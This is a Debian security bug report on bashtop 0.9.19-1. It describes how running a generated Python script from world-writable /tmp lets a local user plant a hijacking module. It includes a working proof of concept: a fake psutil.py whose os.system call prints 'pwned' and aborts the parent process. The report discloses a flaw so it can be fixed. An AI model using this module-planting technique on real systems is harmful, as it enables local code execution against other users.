Package: bashtop
Version: 0.9.19-1
Severity: grave
Tags: security
bashtop creates a Python script in /tmp and runs it. But Python adds the
directory containing the script to the module search path¹, and /tmp is
world-writable, so this in insecure. A local user could plant malicious
Python module in /tmp, which would be executed by bashtop.
Proof of concept:
$ install -m 644 /path/to/psutil.py /tmp
$ bashtop
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Aborted
¹ https://docs.python.org/3/using/cmdline.html#cmdarg-script
-- System Information:
Architecture: i386
Versions of packages bashtop depends on:
ii bash 5.0-6
ii gawk 1:5.0.1+dfsg-1
ii procps 2:3.3.16-5
Versions of packages bashtop recommends:
ii lm-sensors 1:3.6.0-2
un sysstat <none>
ii python3-psutil 5.7.0-1
ii curl 7.68.0-1
--
Jakub Wilk
import os; os.system('(tput reset && cowsay pwned) >/dev/tty; kill -ABRT %s' % os.getppid())
